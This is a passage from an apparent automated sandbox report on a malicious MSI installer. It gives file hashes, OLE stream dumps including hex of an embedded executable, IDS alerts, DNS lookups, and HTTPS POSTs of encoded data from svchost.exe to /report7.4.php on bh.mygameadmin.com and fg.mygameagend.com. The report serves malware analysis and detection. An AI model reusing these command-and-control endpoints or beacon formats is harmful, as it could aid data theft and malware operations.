                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: .To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..07/23/2020 10:13:25.847 [3928]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.VisualStudio.Tools.Applications.Hosting, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 10:13:25.863 [3928]: ngen returning 0x00000000..07/23/2020 10:13:25.925 [1900]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.VisualStudio.Tools.Applications.ServerDocument, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 10:13:25.925 [1900]: ngen returning 0x00000000..07/23/2020 10:13:25.972 [4436]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.v4.0.Framework, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /N

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.0, MSI Installer, Code page: 1252, Last Printed: Fri Sep 18 11:48:09 2009, Create Time/Date: Fri Sep 18 11:48:09 2009, Name of Creating Application: Windows Installer, Title: exe2msiSetupPackage, Author: QwertyLab, Template: Intel;1033, Last Saved By: dmitry, Revision Number: {CDFF8FBF-8895-4382-936D-A20B4780ACE1}, Last Saved Time/Date: Fri Sep 18 14:10:05 2009, Number of Pages: 200, Number of Words: 2, Security: 1
                                                                                  Entropy (8bit):7.9317963528183935
                                                                                  TrID:
                                                                                  • Microsoft Windows Installer (77509/1) 90.59%
                                                                                  • Generic OLE2 / Multistream Compound File (8008/1) 9.36%
                                                                                  • Corel Photo Paint (41/41) 0.05%
                                                                                  File name:6rfyiAq0nM.msi
                                                                                  File size:7306752
                                                                                  MD5:623673851fbb205eb0d1003cb892d4d6
                                                                                  SHA1:c541b4e10541bb0a6565ba8cc6b64d2480ef4437
                                                                                  SHA256:71a98e982a9dde0ffcf9a46554b7abaf947ac4c33f3a3b35df1a58b0064d0704
                                                                                  SHA512:ae40bb582937b32c25e0a465cac75106b04f6e0880cbf0e920f9c0dd80d7dd3e71a9c62ba8607375d7200675d4b4f18571745e00bd920418a662955e4be23669
                                                                                  SSDEEP:196608:8GTKBLeU6tpYgnZhKMBSZXnjfxLn1MUAJShcHgJ6M8YY:8GmcTpRGZ3jtn1IShcc8YY
                                                                                  File Content Preview:........................>...................p...............A...................f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...{...|...}...~..............................................................................

                                                                                  File Icon

                                                                                  Icon Hash:a2a0b496b2caca72

                                                                                  Static OLE Info

                                                                                  General

                                                                                  Document Type:OLE
                                                                                  Number of OLE Files:1

                                                                                  OLE File "6rfyiAq0nM.msi"

                                                                                  Indicators

                                                                                  Has Summary Info:True
                                                                                  Application Name:Windows Installer
                                                                                  Encrypted Document:True
                                                                                  Contains Word Document Stream:False
                                                                                  Contains Workbook/Book Stream:False
                                                                                  Contains PowerPoint Document Stream:False
                                                                                  Contains Visio Document Stream:False
                                                                                  Contains ObjectPool Stream:
                                                                                  Flash Objects Count:
                                                                                  Contains VBA Macros:False

                                                                                  Summary

                                                                                  Code Page:1252
                                                                                  Title:exe2msiSetupPackage
                                                                                  Subject:
                                                                                  Author:QwertyLab
                                                                                  Keywords:
                                                                                  Comments:
                                                                                  Template:Intel;1033
                                                                                  Last Saved By:dmitry
                                                                                  Revion Number:{CDFF8FBF-8895-4382-936D-A20B4780ACE1}
                                                                                  Last Printed:2009-09-18 10:48:09.509000
                                                                                  Create Time:2009-09-18 10:48:09.509000
                                                                                  Last Saved Time:2009-09-18 13:10:05.783000
                                                                                  Number of Pages:200
                                                                                  Number of Words:2
                                                                                  Creating Application:Windows Installer
                                                                                  Security:1

                                                                                  Streams

                                                                                  Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 448
                                                                                  General
                                                                                  Stream Path:\x5SummaryInformation
                                                                                  File Type:data
                                                                                  Stream Size:448
                                                                                  Entropy:3.98974006197
                                                                                  Base64 Encoded:True
                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . . . . . . . < . . . . . . . l . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . P e . . M 8 . . @ . . . P e . . M 8 . . . . . . . . . . W i n d o w s I n s t a l l e r . . . . . . . . . . . e x e 2
                                                                                  Data Raw:fe ff 00 00 06 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 90 01 00 00 10 00 00 00 01 00 00 00 88 00 00 00 0b 00 00 00 90 00 00 00 0c 00 00 00 9c 00 00 00 12 00 00 00 a8 00 00 00 02 00 00 00 c4 00 00 00 03 00 00 00 e0 00 00 00 04 00 00 00 ec 00 00 00 05 00 00 00 00 01 00 00 06 00 00 00 0c 01 00 00
                                                                                  Stream Path: \x17163\x16689\x18229\x18430\x14797\x14413\x14465\x14351\x14916\x14987\x14977\x14662\x15045\x15173\x14985\x15169\x14784\x14464\x15245\x14670, File Type: PE32 executable (GUI) Intel 80386, for MS Windows, Stream Size: 7196212
                                                                                  General
                                                                                  Stream Path:\x17163\x16689\x18229\x18430\x14797\x14413\x14465\x14351\x14916\x14987\x14977\x14662\x15045\x15173\x14985\x15169\x14784\x14464\x15245\x14670
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Stream Size:7196212
                                                                                  Entropy:7.9486797875
                                                                                  Base64 Encoded:True
                                                                                  Data ASCII:M Z P . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . L . ! . . T h i s p r o g r a m m u s t b e r u n u n d e r W i n 3 2 . . $ 7 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                  Data Raw:4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00
                                                                                  Stream Path: \x18496\x15167\x17394\x17464\x17841, File Type: data, Stream Size: 3280
                                                                                  General
                                                                                  Stream Path:\x18496\x15167\x17394\x17464\x17841
                                                                                  File Type:data
                                                                                  Stream Size:3280
                                                                                  Entropy:5.27810535323
                                                                                  Base64 Encoded:False
                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . % . % . % . ' . ' . ' . - . - . - . - . - . - . - . - . 1 . 1 . 1 . 2 . 2 . 2 . 3 . 3 . 3 . 4 . 4 . 4 . 4 . 4 . 4 . 4 . = . = . > . > . F . F . F . F . F . F . F . F . F . N . N . N . N . ` . ` . ` . j . j . n . n . p . p . p . p . p . p . p . p . y . y . y . y . y . y . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                  Data Raw:05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 1f 00 1f 00 1f 00 25 00 25 00 25 00 27 00 27 00 27 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 31 00 31 00 31 00 32 00 32 00 32 00 33 00 33 00 33 00 34 00 34 00 34 00 34 00 34 00 34 00 34 00 3d 00 3d 00 3e 00 3e 00 46 00 46 00 46 00 46 00 46 00 46 00 46 00 46 00 46 00 4e 00 4e 00 4e 00 4e 00 60 00 60 00 60 00 6a 00
                                                                                  Stream Path: \x18496\x16191\x17783\x17516\x15210\x17892\x18468, File Type: ASCII text, with very long lines, with no line terminators, Stream Size: 29802
                                                                                  General
                                                                                  Stream Path:\x18496\x16191\x17783\x17516\x15210\x17892\x18468
                                                                                  File Type:ASCII text, with very long lines, with no line terminators
                                                                                  Stream Size:29802
                                                                                  Entropy:4.69223735488
                                                                                  Base64 Encoded:True
                                                                                  Data ASCII:N a m e T a b l e T y p e _ V a l i d a t i o n C o l u m n N u l l a b l e M i n V a l u e M a x V a l u e K e y T a b l e K e y C o l u m n C a t e g o r y S e t D e s c r i p t i o n N I d e n t i f i e r N a m e o f t a b l e N a m e o f c o l u m n Y T e x t D e s c r i p t i o n o f c o l u m n S e t o f v a l u e s t h a t a r e p e r m i t t e d T e x t ; F o r m a t t e d ; T e m p l a t e ; C o n d i t i o n ; G u i d ; P a t h ; V e r s i o n ; L a n g u a g e ; I d e n t i
                                                                                  Data Raw:4e 61 6d 65 54 61 62 6c 65 54 79 70 65 5f 56 61 6c 69 64 61 74 69 6f 6e 43 6f 6c 75 6d 6e 4e 75 6c 6c 61 62 6c 65 4d 69 6e 56 61 6c 75 65 4d 61 78 56 61 6c 75 65 4b 65 79 54 61 62 6c 65 4b 65 79 43 6f 6c 75 6d 6e 43 61 74 65 67 6f 72 79 53 65 74 44 65 73 63 72 69 70 74 69 6f 6e 4e 49 64 65 6e 74 69 66 69 65 72 4e 61 6d 65 20 6f 66 20 74 61 62 6c 65 4e 61 6d 65 20 6f 66 20 63 6f 6c
                                                                                  Stream Path: \x18496\x16191\x17783\x17516\x15978\x17586\x18479, File Type: data, Stream Size: 3008
                                                                                  General
                                                                                  Stream Path:\x18496\x16191\x17783\x17516\x15978\x17586\x18479
                                                                                  File Type:data
                                                                                  Stream Size:3008
                                                                                  Entropy:3.52620475136
                                                                                  Base64 Encoded:False
                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . G . . . . . . . . . . . . . . . . $ . . . 6 . . . . . . . . . . . . . . . . . . . . . . . T . . . . . . . . . . . . . . . j . . . . . . . B . . . . . ( . . . . . . . . . o . . . M . . . . . . . . . . . . . . . . . . . K . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . . . . . . . . . . . ( . . .
                                                                                  Data Raw:e4 04 00 00 04 00 14 00 05 00 06 00 00 00 00 00 04 00 0c 00 0b 00 15 00 06 00 02 00 08 00 02 00 08 00 02 00 08 00 02 00 08 00 02 00 09 00 02 00 08 00 02 00 03 00 02 00 0b 00 18 00 01 00 02 01 0a 00 99 00 0d 00 01 00 0e 00 01 00 01 00 ac 00 04 00 47 00 15 00 01 00 20 00 01 00 ca 00 01 00 0f 00 01 00 24 00 01 00 36 00 01 00 15 00 01 00 15 00 01 00 05 00 01 00 1e 00 01 00 0a 00 07 00
                                                                                  Stream Path: \x18496\x16255\x16740\x16943\x18486, File Type: data, Stream Size: 172
                                                                                  General
                                                                                  Stream Path:\x18496\x16255\x16740\x16943\x18486
                                                                                  File Type:data
                                                                                  Stream Size:172
                                                                                  Entropy:4.83586062657
                                                                                  Base64 Encoded:False
                                                                                  Data ASCII:. . . . % . ' . - . 1 . 2 . 3 . 4 . = . > . F . N . ` . j . n . p . y . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . & . ) . 0 . 4 . A . H . I . J . O . R . U . Y . d . r . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . : . J . [ . e . m . p . } .
                                                                                  Data Raw:05 00 1f 00 25 00 27 00 2d 00 31 00 32 00 33 00 34 00 3d 00 3e 00 46 00 4e 00 60 00 6a 00 6e 00 70 00 79 00 84 00 85 00 88 00 9b 00 a0 00 b4 00 ba 00 bd 00 c6 00 cc 00 df 00 e6 00 ed 00 f0 00 f8 00 00 01 09 01 0e 01 12 01 17 01 1a 01 23 01 26 01 29 01 30 01 34 01 41 01 48 01 49 01 4a 01 4f 01 52 01 55 01 59 01 64 01 72 01 8e 01 99 01 9f 01 a2 01 a7 01 af 01 b6 01 bb 01 bf 01 c8 01
                                                                                  Stream Path: \x18496\x16383\x17380\x16876\x17892\x17580\x18481, File Type: data, Stream Size: 10176
                                                                                  General
                                                                                  Stream Path:\x18496\x16383\x17380\x16876\x17892\x17580\x18481
                                                                                  File Type:data
                                                                                  Stream Size:10176
                                                                                  Entropy:2.8257387661
                                                                                  Base64 Encoded:False
                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . % . % . % . ' . ' . ' . - . - . - . - . - . - . - . - . 1 . 1 . 1 . 2 . 2 . 2 . 3 . 3 . 3 . 4 . 4 . 4 . 4 . 4 . 4 . 4 . = . = . > . > . F . F . F . F . F . F . F . F . F . N . N . N . N . ` . ` . ` . j . j . n . n . p . p . p . p . p . p . p . p . y . y . y . y . y . y . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                  Data Raw:05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 1f 00 1f 00 1f 00 25 00 25 00 25 00 27 00 27 00 27 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 31 00 31 00 31 00 32 00 32 00 32 00 33 00 33 00 33 00 34 00 34 00 34 00 34 00 34 00 34 00 34 00 3d 00 3d 00 3e 00 3e 00 46 00 46 00 46 00 46 00 46 00 46 00 46 00 46 00 46 00 4e 00 4e 00 4e 00 4e 00 60 00 60 00 60 00 6a 00
                                                                                  Stream Path: \x18496\x16842\x17200\x15281\x16955\x17958\x16951\x16924\x17972\x17512\x16934, File Type: data, Stream Size: 54
                                                                                  General
                                                                                  Stream Path:\x18496\x16842\x17200\x15281\x16955\x17958\x16951\x16924\x17972\x17512\x16934
                                                                                  File Type:data
                                                                                  Stream Size:54
                                                                                  Entropy:3.64425475307
                                                                                  Base64 Encoded:False
                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . < .
                                                                                  Data Raw:83 02 85 02 86 02 87 02 88 02 89 02 8a 02 8b 02 8c 02 84 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ee 82 20 83 84 83 e8 83 78 85 dc 85 a0 8f c8 99 3c 8f
                                                                                  Stream Path: \x18496\x16842\x17913\x18126\x16808\x17912\x16168\x17704\x16952\x16817\x18472, File Type: data, Stream Size: 84
                                                                                  General
                                                                                  Stream Path:\x18496\x16842\x17913\x18126\x16808\x17912\x16168\x17704\x16952\x16817\x18472
                                                                                  File Type:data
                                                                                  Stream Size:84
                                                                                  Entropy:3.94190859404
                                                                                  Base64 Encoded:False
                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . j . r . . . . . \\ . . . $ . 8 .
                                                                                  Data Raw:83 02 85 02 87 02 88 02 89 02 8b 02 8d 02 8e 02 8f 02 90 02 91 02 92 02 93 02 94 02 84 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ee 82 20 83 e8 83 78 85 dc 85 c8 99 6a 98 72 86 94 91 f8 91 5c 92 c0 92 24 93 38 98
                                                                                  Stream Path: \x18496\x16911\x17892\x17784\x15144\x17458\x17587\x16945\x17905\x18486, File Type: data, Stream Size: 4
                                                                                  General
                                                                                  Stream Path:\x18496\x16911\x17892\x17784\x15144\x17458\x17587\x16945\x17905\x18486
                                                                                  File Type:data
                                                                                  Stream Size:4
                                                                                  Entropy:1.5
                                                                                  Base64 Encoded:False
                                                                                  Data ASCII:. . . .
                                                                                  Data Raw:b2 02 b4 02
                                                                                  Stream Path: \x18496\x16911\x17892\x17784\x18472, File Type: data, Stream Size: 16
                                                                                  General
                                                                                  Stream Path:\x18496\x16911\x17892\x17784\x18472
                                                                                  File Type:data
                                                                                  Stream Size:16
                                                                                  Entropy:2.17742128383
                                                                                  Base64 Encoded:False
                                                                                  Data ASCII:. . . . . . . . . . . . . . . .
                                                                                  Data Raw:b2 02 00 00 00 00 00 00 02 80 01 80 b3 02 00 80
                                                                                  Stream Path: \x18496\x16918\x17191\x18468, File Type: MIPSEB Ucode, Stream Size: 12
                                                                                  General
                                                                                  Stream Path:\x18496\x16918\x17191\x18468
                                                                                  File Type:MIPSEB Ucode
                                                                                  Stream Size:12
                                                                                  Entropy:1.25162916739
                                                                                  Base64 Encoded:False
                                                                                  Data ASCII:. . . . . . . . . . . .
                                                                                  Data Raw:01 80 01 80 00 00 00 00 00 00 00 00
                                                                                  Stream Path: \x18496\x17163\x16689\x18229, File Type: data, Stream Size: 4
                                                                                  General
                                                                                  Stream Path:\x18496\x17163\x16689\x18229
                                                                                  File Type:data
                                                                                  Stream Size:4
                                                                                  Entropy:2.0
                                                                                  Base64 Encoded:False
                                                                                  Data ASCII:. . . .
                                                                                  Data Raw:ea 02 01 00
                                                                                  Stream Path: \x18496\x17165\x16949\x17894\x17778\x18492, File Type: data, Stream Size: 18
                                                                                  General
                                                                                  Stream Path:\x18496\x17165\x16949\x17894\x17778\x18492
                                                                                  File Type:data
                                                                                  Stream Size:18
                                                                                  Entropy:2.46132014021
                                                                                  Base64 Encoded:False
                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . .
                                                                                  Data Raw:b3 02 b8 02 ba 02 00 00 b3 02 b3 02 b7 02 b9 02 bb 02
                                                                                  Stream Path: \x18496\x17490\x17910\x17380\x15279\x16955\x17958\x16951\x16924\x17972\x17512\x16934, File Type: data, Stream Size: 384
                                                                                  General
                                                                                  Stream Path:\x18496\x17490\x17910\x17380\x15279\x16955\x17958\x16951\x16924\x17972\x17512\x16934
                                                                                  File Type:data
                                                                                  Stream Size:384
                                                                                  Entropy:4.95816205211
                                                                                  Base64 Encoded:False
                                                                                  Data ASCII:= . n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                  Data Raw:3d 00 6e 00 84 00 83 02 85 02 86 02 87 02 88 02 89 02 8a 02 8b 02 8d 02 8e 02 8f 02 90 02 91 02 92 02 93 02 94 02 96 02 be 02 bf 02 c0 02 c1 02 c2 02 c4 02 c5 02 c6 02 c7 02 c8 02 c9 02 cb 02 cc 02 cd 02 ce 02 cf 02 d0 02 d1 02 d2 02 d3 02 d4 02 d5 02 d6 02 d7 02 d8 02 d9 02 da 02 db 02 dc 02 dd 02 de 02 df 02 e0 02 e1 02 e2 02 e3 02 e4 02 e5 02 e6 02 e7 02 e8 02 e9 02 ec 02 ed 02
                                                                                  Stream Path: \x18496\x17548\x17648\x17522\x17512\x18487, File Type: data, Stream Size: 12
                                                                                  General
                                                                                  Stream Path:\x18496\x17548\x17648\x17522\x17512\x18487
                                                                                  File Type:data
                                                                                  Stream Size:12
                                                                                  Entropy:2.52205520887
                                                                                  Base64 Encoded:False
                                                                                  Data ASCII:. . . . . . . . . . . .
                                                                                  Data Raw:b4 02 b5 02 b3 02 00 80 b6 02 00 00
                                                                                  Stream Path: \x18496\x17558\x17959\x16943\x17180\x17514\x17892\x17784\x18472, File Type: data, Stream Size: 6
                                                                                  General
                                                                                  Stream Path:\x18496\x17558\x17959\x16943\x17180\x17514\x17892\x17784\x18472
                                                                                  File Type:data
                                                                                  Stream Size:6
                                                                                  Entropy:2.25162916739
                                                                                  Base64 Encoded:False
                                                                                  Data ASCII:. . . . . .
                                                                                  Data Raw:ee 02 09 84 ef 02
                                                                                  Stream Path: \x18496\x17753\x17650\x17768\x18231, File Type: data, Stream Size: 60
                                                                                  General
                                                                                  Stream Path:\x18496\x17753\x17650\x17768\x18231
                                                                                  File Type:data
                                                                                  Stream Size:60
                                                                                  Entropy:3.38677863114
                                                                                  Base64 Encoded:False
                                                                                  Data ASCII:w . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                  Data Raw:77 02 98 02 9a 02 9c 02 9e 02 a0 02 a1 02 a3 02 a5 02 a7 02 a9 02 ab 02 ad 02 af 02 b1 02 97 02 99 02 9b 02 9d 02 9f 02 9f 02 a2 02 a4 02 a6 02 a8 02 aa 02 ac 02 ae 02 b0 02 a4 02
                                                                                  Stream Path: \x18496\x17932\x17910\x17458\x16778\x17207\x17522, File Type: data, Stream Size: 16
                                                                                  General
                                                                                  Stream Path:\x18496\x17932\x17910\x17458\x16778\x17207\x17522
                                                                                  File Type:data
                                                                                  Stream Size:16
                                                                                  Entropy:2.90563906223
                                                                                  Base64 Encoded:False
                                                                                  Data ASCII:. . . . 3 . . . . . . . . . . .
                                                                                  Data Raw:83 02 96 02 33 81 02 8c b3 02 ea 02 bc 02 00 00

                                                                                  Network Behavior

                                                                                  Snort IDS Alerts

                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                  10/24/21-12:49:34.014326UDP1948DNS zone transfer UDP6078553192.168.2.334.64.183.91
                                                                                  10/24/21-12:49:42.697753UDP1948DNS zone transfer UDP6078553192.168.2.334.64.183.91
                                                                                  10/24/21-12:49:47.628452UDP1948DNS zone transfer UDP6078553192.168.2.334.64.183.91
                                                                                  10/24/21-12:49:58.425112UDP1948DNS zone transfer UDP6078553192.168.2.334.64.183.91
                                                                                  10/24/21-12:50:06.100895ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.334.64.183.91
                                                                                  10/24/21-12:50:06.820513ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.334.64.183.91
                                                                                  10/24/21-12:50:07.902093ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.334.64.183.91
                                                                                  10/24/21-12:50:09.460402ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.334.64.183.91
                                                                                  10/24/21-12:50:10.421239ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.334.64.183.91
                                                                                  10/24/21-12:51:41.901821UDP1948DNS zone transfer UDP5394753192.168.2.334.64.183.91

                                                                                  Network Port Distribution

                                                                                  UDP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Oct 24, 2021 12:49:25.744143963 CEST6402153192.168.2.38.8.8.8
                                                                                  Oct 24, 2021 12:49:25.744909048 CEST6078453192.168.2.38.8.8.8
                                                                                  Oct 24, 2021 12:49:25.765116930 CEST53640218.8.8.8192.168.2.3
                                                                                  Oct 24, 2021 12:49:25.769309044 CEST53607848.8.8.8192.168.2.3

                                                                                  DNS Queries

                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                  Oct 24, 2021 12:49:25.744143963 CEST192.168.2.38.8.8.80x5e85Standard query (0)toa.mygametoa.comA (IP address)IN (0x0001)
                                                                                  Oct 24, 2021 12:49:25.744909048 CEST192.168.2.38.8.8.80xdd65Standard query (0)toa.mygametoa.com28IN (0x0001)

                                                                                  DNS Answers

                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                  Oct 24, 2021 12:49:25.765116930 CEST8.8.8.8192.168.2.30x5e85No error (0)toa.mygametoa.com34.64.183.91A (IP address)IN (0x0001)

                                                                                  HTTP Request Dependency Graph

                                                                                  • bh.mygameadmin.com
                                                                                  • fg.mygameagend.com

                                                                                  HTTPS Proxied Packets

                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  0192.168.2.349805104.21.75.46443C:\Windows\System32\svchost.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  2021-10-24 10:50:06 UTC0OUTPOST /report7.4.php HTTP/1.1
                                                                                  Accept: */*
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
                                                                                  Host: bh.mygameadmin.com
                                                                                  Content-Length: 278
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2021-10-24 10:50:06 UTC0OUTData Raw: 70 3d 6b 61 5a 35 62 47 64 69 59 6e 74 67 62 33 69 6d 33 71 54 63 33 4e 79 67 70 4b 5a 35 5a 57 74 69 61 4a 61 66 6d 57 56 34 65 36 62 65 70 4b 61 5a 6a 4b 61 67 70 4b 5a 34 5a 32 68 6e 70 74 36 6b 6b 61 61 47 6c 6d 56 74 61 58 75 57 70 74 36 6b 70 70 6d 31 74 62 57 31 70 71 43 6b 70 6d 6c 6f 5a 32 68 37 70 74 36 6b 31 35 4f 67 70 4b 5a 76 6c 4b 62 65 70 4b 62 58 31 4e 61 69 31 39 62 66 6f 74 65 6f 71 61 4b 70 71 61 61 67 70 4b 5a 6a 5a 33 6c 73 62 32 4a 37 62 33 69 6d 33 71 53 6d 71 34 66 66 33 4a 6d 74 6d 71 69 71 31 71 75 71 31 39 61 48 71 4e 79 71 68 39 61 47 31 4b 75 70 6d 39 24 66 6d 71 32 47 68 70 69 6d 6f 4b 53 6d 59 32 70 37 6c 71 62 65 70 4b 62 63 6f 74 40 6d 6f 4b 53 6d 6c 6e 74 39 62 32 56 69 70 74 36 6b 70 72 36 64 70 71 43 6b 70 6d 69 66 6c
                                                                                  Data Ascii: p=kaZ5bGdiYntgb3im3qTc3NygpKZ5ZWtiaJafmWV4e6bepKaZjKagpKZ4Z2hnpt6kkaaGlmVtaXuWpt6kppm1tbW1pqCkpmloZ2h7pt6k15OgpKZvlKbepKbX1Nai19bfoteoqaKpqaagpKZjZ3lsb2J7b3im3qSmq4ff3Jmtmqiq1quq19aHqNyqh9aG1Kupm9$fmq2GhpimoKSmY2p7lqbepKbcot@moKSmlnt9b2Vipt6kpr6dpqCkpmifl
                                                                                  2021-10-24 10:50:06 UTC0INHTTP/1.1 200 OK
                                                                                  Date: Sun, 24 Oct 2021 10:50:06 GMT
                                                                                  Content-Type: application/json; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  vary: Accept-Encoding
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jdf50sAmKZd6hLj9ndhfpyKIog6ideF2zxWcBaYKj894GXG0PFqHMV8vHTZYdmXG7Y%2FQZs0GQPAaX2O89bWX2YaOvd8H1CAkVAsqSmhb2pw28sUNeAGhJVPDz95OyfMf1YXMv2Q%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 6a32a46d09d06958-FRA
                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                  2021-10-24 10:50:06 UTC1INData Raw: 33 62 0d 0a 7b 22 68 6f 73 74 22 3a 5b 5d 2c 22 73 70 61 63 69 6e 67 22 3a 31 38 30 30 2c 22 73 70 61 63 69 6e 67 32 22 3a 31 32 30 2c 22 64 61 74 61 22 3a 7b 22 63 6f 64 65 22 3a 31 7d 7d 0d 0a
                                                                                  Data Ascii: 3b{"host":[],"spacing":1800,"spacing2":120,"data":{"code":1}}
                                                                                  2021-10-24 10:50:06 UTC1INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  1192.168.2.349807172.67.167.122443C:\Windows\System32\svchost.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  2021-10-24 10:50:06 UTC1OUTPOST /report7.4.php HTTP/1.1
                                                                                  Accept: */*
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
                                                                                  Host: fg.mygameagend.com
                                                                                  Content-Length: 278
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
